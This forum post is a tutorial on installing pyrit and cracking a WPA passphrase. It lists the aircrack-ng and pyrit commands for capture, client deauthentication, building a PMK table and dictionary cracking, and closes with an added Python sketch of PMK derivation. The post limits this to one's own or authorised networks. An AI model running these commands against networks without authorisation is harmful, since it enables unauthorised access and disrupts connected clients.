Hey all,

After the SSH video I decided to record the next one. These were initially just for my reference, as I'm pretty forgetful; however, g0tmi1k suggested I should publish them.

So first of all I looked at how to set up/install pyrit. It has been covered in the How-to section, and this is where I got the commands from.
However I still recorded a video for it here:
Installing pyrit in bt5 Blip.tv

Blog post here:
j2neon.blogspot: Installing pyrit into BT5

There are other links at the bottom of the blog post for those who don't like Blip.

Once pyrit was set up and had been benchmarked, I looked at cracking WPA.

This is the same as cracking WPA with any other program!

Firstly, it has to be your own router or you must have permission from the administrator.
Secondly, the key that you're cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecurepass'.
Finally, the access point has to have a client connected, because during the process of capturing a handshake the client is de-authenticated, allowing the handshake to be recaptured.

Commands for using aircrack and pyrit:

# put the wireless card into monitor mode (creates mon0) and find the target network
airmon-ng start wlan0
airodump-ng mon0
# lock onto the channel and BSSID of your own AP and write the capture to output-01.cap
airodump-ng -c 11 -w output --bssid bssid mon0
# de-authenticate the connected client so the 4-way handshake is captured on reconnect
aireplay-ng --deauth 0 -a bssid -c client mon0

# show the (empty) database, load the wordlist and the ESSID, then precompute the PMKs
pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
# export the precomputed table as an airolib-ng database for aircrack-ng
pyrit -o wpadb export_hashdb

# test the handshake in the capture against the precomputed table
aircrack-ng -r wpadb output-01.cap

Video Link:
Cracking WPA using pyrit/aircrack Blip.tv

j2neon.blogspot: Cracking WPA using pyrit and aircrack

Once again, there are extra links on the blog post.

I know there are many ways of doing this and I know that I only used a low number of passwords in the list but this is just to give people an intro to using pyrit and what it can do!
Any suggestions and tips will be greatly appreciated.
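What the `pyrit batch` step above actually precomputes, as an added example that is not j2neon's code or part of pyrit: WPA/WPA2-PSK derives the 256-bit PMK with PBKDF2-HMAC-SHA1, salted with the ESSID, and a precomputed table is only a passphrase-to-PMK map for one ESSID. The wordlist and the ESSID "OtherAP" are constructed for the example; "j2neonAP" is the ESSID from the post.

```python
import hashlib

# Constructed sample wordlist (not from the post). WPA passphrases must be
# 8-63 characters, so every candidate here is at least 8 characters long.
WORDLIST = ["password", "Insecurepass", "insecurepass", "letmein1", "qwertyuiop"]


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """Derive the PMK exactly as WPA/WPA2-PSK does (IEEE 802.11i):
    PBKDF2-HMAC-SHA1, salt = ESSID, 4096 iterations, 32-byte output.
    This is the value 'pyrit batch' computes for every word in the database."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def build_table(wordlist, essid: str) -> dict:
    """Precompute passphrase -> PMK for one ESSID, as pyrit does after
    import_passwords/create_essid. Because the ESSID is the salt, a table
    built for one network says nothing about a network with another ESSID."""
    return {word: wpa_pmk(word, essid) for word in wordlist}


def lookup(table: dict, target_pmk: bytes):
    """Return the word that produced target_pmk, or None when it is not in the
    list. None models the post's point: if the key isn't in the dictionary,
    it cannot be recovered, and 'insecurepass' != 'Insecurepass'."""
    for word, pmk in table.items():
        if pmk == target_pmk:
            return word
    return None


def demo() -> dict:
    """Show the three properties the post relies on: case sensitivity,
    ESSID binding, and 'not in the list means not found'."""
    table = build_table(WORDLIST, "j2neonAP")
    return {
        "case_sensitive": wpa_pmk("insecurepass", "j2neonAP") != wpa_pmk("Insecurepass", "j2neonAP"),
        "essid_bound": wpa_pmk("insecurepass", "j2neonAP") != wpa_pmk("insecurepass", "OtherAP"),
        "in_list": lookup(table, wpa_pmk("insecurepass", "j2neonAP")),
        "not_in_list": lookup(table, wpa_pmk("correct horse battery", "j2neonAP")),
    }


if __name__ == "__main__":
    print(demo())
```

The real check in aircrack-ng goes one step further and compares a MIC derived from the PMK and the captured handshake, but the table itself is just this map, which is why it has to be rebuilt for every ESSID.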